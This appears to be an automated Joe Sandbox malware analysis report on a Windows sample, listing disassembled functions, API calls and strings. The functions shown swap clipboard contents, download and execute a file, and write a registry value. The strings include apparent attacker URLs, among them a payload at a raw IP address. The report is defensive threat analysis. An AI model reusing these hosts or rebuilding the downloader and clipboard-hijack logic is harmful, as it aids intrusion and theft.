40fd2e 64390->64391 64392 40fd37 64391->64392 64415 42ff8c 28 API calls _Atexit 64391->64415 64416 4101a7 13 API calls 2 library calls 64392->64416 64395 40fd3f 64395->64381 64397 410021 64396->64397 64420 41079b IsProcessorFeaturePresent 64397->64420 64399 41002d 64421 428847 10 
API calls 3 library calls 64399->64421 64401 410032 64402 410036 64401->64402 64422 4317c1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64401->64422 64402->64370 64404 41003f 64405 41004d 64404->64405 64423 428870 8 API calls 3 library calls 64404->64423 64405->64370 64424 426850 64407->64424 64410 410633 64410->64386 64411->64379 64412->64383 64413->64387 64414->64390 64415->64392 64416->64395 64417->64373 64418->64376 64419->64380 64420->64399 64421->64401 64422->64404 64423->64402 64425 410620 GetStartupInfoW 64424->64425 64425->64410 64426 2da9c56 64427 2da9c59 64426->64427 64430 2da9f06 64427->64430 64431 2da9f15 64430->64431 64434 2daa6a6 64431->64434 64435 2daa6c1 64434->64435 64436 2daa6ca CreateToolhelp32Snapshot 64435->64436 64437 2daa6e6 Module32First 64435->64437 64436->64435 64436->64437 64438 2da9f05 64437->64438 64439 2daa6f5 64437->64439 64441 2daa365 64439->64441 64442 2daa390 64441->64442 64443 2daa3d9 64442->64443 64444 2daa3a1 VirtualAlloc 64442->64444 64443->64443 64444->64443 64445 402bcd RegCreateKeyExW 64446 402bfb RegSetValueExW 64445->64446 64447 402c0f 64445->64447 64446->64447 64448 402c14 RegCloseKey 64447->64448 64449 402c1d 64447->64449 64448->64449 64450 4332fe 64451 43330b 64450->64451 64455 433323 64450->64455 64500 42eae9 20 API calls _Atexit 64451->64500 64453 433310 64501 42a5bd 26 API calls _Deallocate 64453->64501 64458 43337e 64455->64458 64464 43331b 64455->64464 64502 434ced 21 API calls 2 library calls 64455->64502 64457 432928 __fread_nolock 26 API calls 64459 433396 64457->64459 64458->64457 64470 432e36 64459->64470 64461 43339d 64462 432928 __fread_nolock 26 API calls 64461->64462 64461->64464 64463 4333c9 64462->64463 64463->64464 64465 432928 __fread_nolock 26 API calls 64463->64465 64466 4333d7 64465->64466 64466->64464 64467 432928 __fread_nolock 26 API calls 64466->64467 64468 4333e7 64467->64468 64469 432928 __fread_nolock 26 API calls 
64468->64469 64469->64464 64471 432e42 CallCatchBlock 64470->64471 64472 432e62 64471->64472 64473 432e4a 64471->64473 64475 432f28 64472->64475 64479 432e9b 64472->64479 64569 42ead6 20 API calls _Atexit 64473->64569 64576 42ead6 20 API calls _Atexit 64475->64576 64476 432e4f 64570 42eae9 20 API calls _Atexit 64476->64570 64481 432eaa 64479->64481 64482 432ebf 64479->64482 64480 432f2d 64577 42eae9 20 API calls _Atexit 64480->64577 64571 42ead6 20 API calls _Atexit 64481->64571 64503 4396c4 EnterCriticalSection 64482->64503 64486 432eb7 64578 42a5bd 26 API calls _Deallocate 64486->64578 64487 432eaf 64572 42eae9 20 API calls _Atexit 64487->64572 64488 432ec5 64489 432ee1 64488->64489 64490 432ef6 64488->64490 64573 42eae9 20 API calls _Atexit 64489->64573 64504 432f49 64490->64504 64494 432e57 __fread_nolock 64494->64461 64496 432ee6 64574 42ead6 20 API calls _Atexit 64496->64574 64497 432ef1 64575 432f20 LeaveCriticalSection __wsopen_s 64497->64575 64500->64453 64501->64464 64502->64458 64503->64488 64505 432f73 64504->64505 64506 432f5b 64504->64506 64508 4332dd 64505->64508 64511 432fb8 64505->64511 64588 42ead6 20 API calls _Atexit 64506->64588 64606 42ead6 20 API calls _Atexit 64508->64606 64509 432f60 64589 42eae9 20 API calls _Atexit 64509->64589 64514 432fc3 64511->64514 64517 432f68 64511->64517 64522 432ff3 64511->64522 64513 4332e2 64607 42eae9 20 API calls _Atexit 64513->64607 64590 42ead6 20 API calls _Atexit 64514->64590 64517->64497 64518 432fd0 64608 42a5bd 26 API calls _Deallocate 64518->64608 64519 432fc8 64591 42eae9 20 API calls _Atexit 64519->64591 64523 43300c 64522->64523 64524 433032 64522->64524 64525 43304e 64522->64525 64523->64524 64531 433019 64523->64531 64592 42ead6 20 API calls _Atexit 64524->64592 64595 4336c7 21 API calls 3 library calls 64525->64595 64527 433037 64593 42eae9 20 API calls _Atexit 64527->64593 64579 43d385 64531->64579 64532 433065 64535 43348a _free 20 API calls 64532->64535 64533 43303e 64594 42a5bd 26 API calls 
_Deallocate 64533->64594 64534 4331b7 64537 43322d 64534->64537 64540 4331d0 GetConsoleMode 64534->64540 64538 43306e 64535->64538 64539 433231 ReadFile 64537->64539 64541 43348a _free 20 API calls 64538->64541 64542 4332a5 GetLastError 64539->64542 64543 43324b 64539->64543 64540->64537 64544 4331e1 64540->64544 64545 433075 64541->64545 64546 4332b2 64542->64546 64547 433209 64542->64547 64543->64542 64548 433222 64543->64548 64544->64539 64549 4331e7 ReadConsoleW 64544->64549 64550 43309a 64545->64550 64551 43307f 64545->64551 64604 42eae9 20 API calls _Atexit 64546->64604 64566 433049 __fread_nolock 64547->64566 64601 42eab3 20 API calls 3 library calls 64547->64601 64562 433270 64548->64562 64563 433287 64548->64563 64548->64566 64549->64548 64554 433203 GetLastError 64549->64554 64598 43480e 64550->64598 64596 42eae9 20 API calls _Atexit 64551->64596 64554->64547 64555 43348a _free 20 API calls 64555->64517 64557 433084 64597 42ead6 20 API calls _Atexit 64557->64597 64558 4332b7 64605 42ead6 20 API calls _Atexit 64558->64605 64602 432c65 31 API calls 3 library calls 64562->64602 64565 43329e 64563->64565 64563->64566 64603 432aa5 29 API calls __fread_nolock 64565->64603 64566->64555 64568 4332a3 64568->64566 64569->64476 64570->64494 64571->64487 64572->64486 64573->64496 64574->64497 64575->64494 64576->64480 64577->64486 64578->64494 64580 43d392 64579->64580 64581 43d39f 64579->64581 64609 42eae9 20 API calls _Atexit 64580->64609 64584 43d3ab 64581->64584 64610 42eae9 20 API calls _Atexit 64581->64610 64583 43d397 64583->64534 64584->64534 64586 43d3cc 64611 42a5bd 26 API calls _Deallocate 64586->64611 64588->64509 64589->64517 64590->64519 64591->64518 64592->64527 64593->64533 64594->64566 64595->64532 64596->64557 64597->64566 64599 434775 __fread_nolock 28 API calls 64598->64599 64600 434824 64599->64600 64600->64531 64601->64566 64602->64566 64603->64568 64604->64558 64605->64566 64606->64513 64607->64518 64608->64517 64609->64583 64610->64586 
64611->64583 64612 483003c 64613 4830049 64612->64613 64627 4830e0f SetErrorMode SetErrorMode 64613->64627 64618 4830265 64619 48302ce VirtualProtect 64618->64619 64621 483030b 64619->64621 64620 4830439 VirtualFree 64625 48305f4 LoadLibraryA 64620->64625 64626 48304be 64620->64626 64621->64620 64622 48304e3 LoadLibraryA 64622->64626 64624 48308c7 64625->64624 64626->64622 64626->64625 64628 4830223 64627->64628 64629 4830d90 64628->64629 64630 4830dad 64629->64630 64631 4830dbb GetPEB 64630->64631 64632 4830238 VirtualAlloc 64630->64632 64631->64632 64632->64618

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • __EH_prolog3_GS.LIBCMT ref: 004016EA
                                                                                  • Sleep.KERNEL32(000011EB,0000004C), ref: 004016F4
                                                                                    • Part of subcall function 0040CC35: _strlen.LIBCMT ref: 0040CC4C
                                                                                  • OpenClipboard.USER32(00000000), ref: 00401721
                                                                                  • GetClipboardData.USER32(00000001), ref: 00401731
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00401740
                                                                                  • _strlen.LIBCMT ref: 0040174D
                                                                                  • _strlen.LIBCMT ref: 0040177C
                                                                                  • _strlen.LIBCMT ref: 004018C0
                                                                                  • EmptyClipboard.USER32 ref: 004018D6
                                                                                  • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018E3
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00401901
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040190D
                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00401916
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0040191D
                                                                                  • CloseClipboard.USER32 ref: 00401941
                                                                                  • Sleep.KERNEL32(000002C7), ref: 0040194C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                  • String ID: i
                                                                                  • API String ID: 1583243082-3865851505
                                                                                  • Opcode ID: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                                                  • Instruction ID: e8206cc808b01b97a457829c5c6b97d93370119956ebdbcfeaa79ca2656f34e0
                                                                                  • Opcode Fuzzy Hash: 62e215a5972df2954ee8547a1aec1863ca14d0d4ddbfcd9f91bb553889a70fc7
                                                                                  • Instruction Fuzzy Hash: EE51E431D00344DBE3119BA4ED46BAD7774FF2A306F04523AE805B62B2EB789A85C75D

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A37
                                                                                  • InternetOpenUrlW.WININET(00000000,0045D830,00000000,00000000,00000000,00000000), ref: 00402A4D
                                                                                  • GetTempPathW.KERNEL32(00000105,?), ref: 00402A69
                                                                                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A7F
                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402AB8
                                                                                  • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AF4
                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402B11
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00402B27
                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00402B88
                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B9D
                                                                                  • CloseHandle.KERNEL32(?), ref: 00402BA9
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00402BB2
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00402BB5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                  • String ID: .exe$<$ShareScreen
                                                                                  • API String ID: 3323492106-493228180
                                                                                  • Opcode ID: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                                                  • Instruction ID: d8cef6b8be2db64f00d3760719452557403e9faa7f5bbaccd6a49820079d0072
                                                                                  • Opcode Fuzzy Hash: cad18285665068766dab7c5d0808057bd44f811c01f48194dcd94531fdcff3d3
                                                                                  • Instruction Fuzzy Hash: 3E41537190021CAEEB20DF50DD85FEAB7BCFF05745F0080FAA545A2190DEB49E858FA4
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DAA6CE
                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 02DAA6EE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4210942714.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DA9000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_2da9000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 3833638111-0

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 0043CD2A: CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                                                  • GetLastError.KERNEL32 ref: 0043D170
                                                                                  • __dosmaperr.LIBCMT ref: 0043D177
                                                                                  • GetFileType.KERNEL32(00000000), ref: 0043D183
                                                                                  • GetLastError.KERNEL32 ref: 0043D18D
                                                                                  • __dosmaperr.LIBCMT ref: 0043D196
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0043D1B6
                                                                                  • CloseHandle.KERNEL32(?), ref: 0043D300
                                                                                  • GetLastError.KERNEL32 ref: 0043D332
                                                                                  • __dosmaperr.LIBCMT ref: 0043D339
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                  • String ID:
                                                                                  • API String ID: 4237864984-0

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0483024D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID: cess$kernel32.dll
                                                                                  • API String ID: 4275171209-1230238691

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C47
                                                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E5F
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00402E70
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00402E73
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandleOpen_wcslen
                                                                                  • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                  • API String ID: 3067768807-1501832161

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                  • String ID: %X@
                                                                                  • API String ID: 1687354797-3313093589

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                                                  • ExitThread.KERNEL32 ref: 0042DFFA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastThread
                                                                                  • String ID: 11@$f(@
                                                                                  • API String ID: 1611280651-1277599000

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • std::_Cnd_initX.LIBCPMT ref: 00405841
                                                                                  • __Cnd_signal.LIBCPMT ref: 0040584D
                                                                                  • std::_Cnd_initX.LIBCPMT ref: 00405862
                                                                                  • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405869
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                  • String ID:
                                                                                  • API String ID: 2059591211-0

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 004029AF
                                                                                  • __fassign.LIBCMT ref: 004029BF
                                                                                    • Part of subcall function 00402843: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                  • String ID: 4+@
                                                                                  • API String ID: 2843524283-3700369575

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateThread.KERNEL32(?,?,Function_0002DFE0,00000000,?,?), ref: 0042E17D
                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,0040CF33,00000000,00000000,?,?,00000000,?), ref: 0042E189
                                                                                  • __dosmaperr.LIBCMT ref: 0042E190
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 2744730728-0

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDFA,00000000,00000002,0040DDFA,00000000,?,?,?,00434824,00000000,00000000,0040DDFA,00000002), ref: 004347AE
                                                                                  • GetLastError.KERNEL32(?,00434824,00000000,00000000,0040DDFA,00000002,?,0042C181,?,00000000,00000000,00000001,?,0040DDFA,?,0042C236), ref: 004347B8
                                                                                  • __dosmaperr.LIBCMT ref: 004347BF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                                                  • String ID:
                                                                                  • API String ID: 2336955059-0

                                                                                   Control-flow Graph

                                                                                   • 487 402bcd-402bf9: RegCreateKeyExW -> 488, 489
                                                                                   • 488 402bfb-402c0d: RegSetValueExW -> 489
                                                                                   • 489 402c0f-402c12 -> 490, 491
                                                                                   • 490 402c14-402c17: RegCloseKey -> 491
                                                                                   • 491 402c1d-402c23
                                                                                  APIs
                                                                                  • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BEF
                                                                                  • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C07
                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C17
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateValue
                                                                                  • String ID:
                                                                                  • API String ID: 1818849710-0
                                                                                  • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                  • Instruction ID: 5f9d8f05081ab8e61a544dd9ed380a1f0a89feb258115cbe41ff1dcf5e2af099
                                                                                  • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                                  • Instruction Fuzzy Hash: 75F0B4B650011CFFEB214F94DD89DAFBA7CEB417E9F100175FA01B2150D6B14E009664

                                                                                   Control-flow Graph

                                                                                   • 492 42e094-42e0a1: call 431f7e -> 495, 496
                                                                                   • 495 42e0a3-42e0a6: ExitThread
                                                                                   • 496 42e0ac-42e0b4 -> 495, 497
                                                                                   • 497 42e0b6-42e0ba -> 498, 499
                                                                                   • 498 42e0c1-42e0c7 -> 501, 502
                                                                                   • 499 42e0bc: call 435516 -> 498
                                                                                   • 501 42e0d4-42e0da -> 495, 504
                                                                                   • 502 42e0c9-42e0cb -> 501, 503
                                                                                   • 503 42e0cd-42e0ce: CloseHandle -> 501
                                                                                   • 504 42e0dc-42e0de -> 495, 505
                                                                                   • 505 42e0e0-42e0ea: FreeLibraryAndExitThread
                                                                                  APIs
                                                                                    • Part of subcall function 00431F7E: GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                                                    • Part of subcall function 00431F7E: _free.LIBCMT ref: 00431FB8
                                                                                    • Part of subcall function 00431F7E: SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                                                  • ExitThread.KERNEL32 ref: 0042E0A6
                                                                                  • CloseHandle.KERNEL32(?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0CE
                                                                                  • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E1C6,?,?,0042E03D,00000000), ref: 0042E0E4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                                  • String ID:
                                                                                  • API String ID: 1198197534-0
                                                                                  • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                  • Instruction ID: 02d263aed51cb6b3bee4cffa2fb4446158e609bbc081d0db7e94150c61e2e04c
                                                                                  • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                                  • Instruction Fuzzy Hash: 8FF05E302006347BDB356F27E808A5B3AA8AF05764F484726B924C37A1D7B8DD828698

                                                                                   Control-flow Graph

                                                                                   • 506 43cfeb-43d005: call 43f961 -> 509, 510
                                                                                   • 509 43d007-43d00a -> 511
                                                                                   • 510 43d00c-43d024: call 43d05c -> 513
                                                                                   • 511 43d038-43d03b
                                                                                   • 513 43d029-43d037: call 43348a -> 511
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _free
                                                                                  • String ID: 'C
                                                                                  • API String ID: 269201875-3508614867
                                                                                  • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                  • Instruction ID: ac23cf383b269f77c0b068b48fc7cf8c71372a03a023b6a8bdb9567da4463856
                                                                                  • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                  • Instruction Fuzzy Hash: D0F09A32810008BBCF155E96EC01DDF3B6AEF89338F10115AFA1492150DA3A8A22ABA4
                                                                                  APIs
                                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 004023E1
                                                                                  • PostQuitMessage.USER32(00000000), ref: 00402583
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePostProcQuitWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3873111417-0
                                                                                  • Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                                                  • Instruction ID: f7540e8b067131d9abd8b97533556e050534cde561c52fa9c46de49641595c4f
                                                                                  • Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                                                  • Instruction Fuzzy Hash: 91410C15A64384A9E730EFA5BD15B2537B0EF64762F10253BE528DB2F2E3B58580C30E
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(0000215D), ref: 00401562
                                                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                    • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$Sleep
                                                                                  • String ID: http://176.113.115.37/ScreenUpdateSync.exe
                                                                                  • API String ID: 3358372957-2681926500
                                                                                  • Opcode ID: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                                                  • Instruction ID: a225884332a17bf582b8fadba65ee921369c39f73c189ef0fca73ca0a6338174
                                                                                  • Opcode Fuzzy Hash: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                                                  • Instruction Fuzzy Hash: 6E318C15A6538094E230CFA5BC66B252330FFA8752F51253BD60CCB2F2E7A19583C71E
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000400,?,?,04830223,?,?), ref: 04830E19
                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,04830223,?,?), ref: 04830E1E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                  • Instruction ID: fac51719a0f8eb966acdf495e1c2fbd6ad291f7a6da94e53058e51221776b9e5
                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                  • Instruction Fuzzy Hash: 14D0123164512877D7003A94DC09BCD7B1CDF05B63F008411FB0DD9080C770954046E5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                  • Instruction ID: c13f0aaa9ffca533a2c3afb5b433fd4ee60c85f45f94f80d5c2ee7b15d17ea23
                                                                                  • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                  • Instruction Fuzzy Hash: 2051C331A00218AFDB10DF59C840BEA7BA1EBC9364F19919AF809AB391C735FD42CB54
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fread_nolock
                                                                                  • String ID:
                                                                                  • API String ID: 2638373210-0
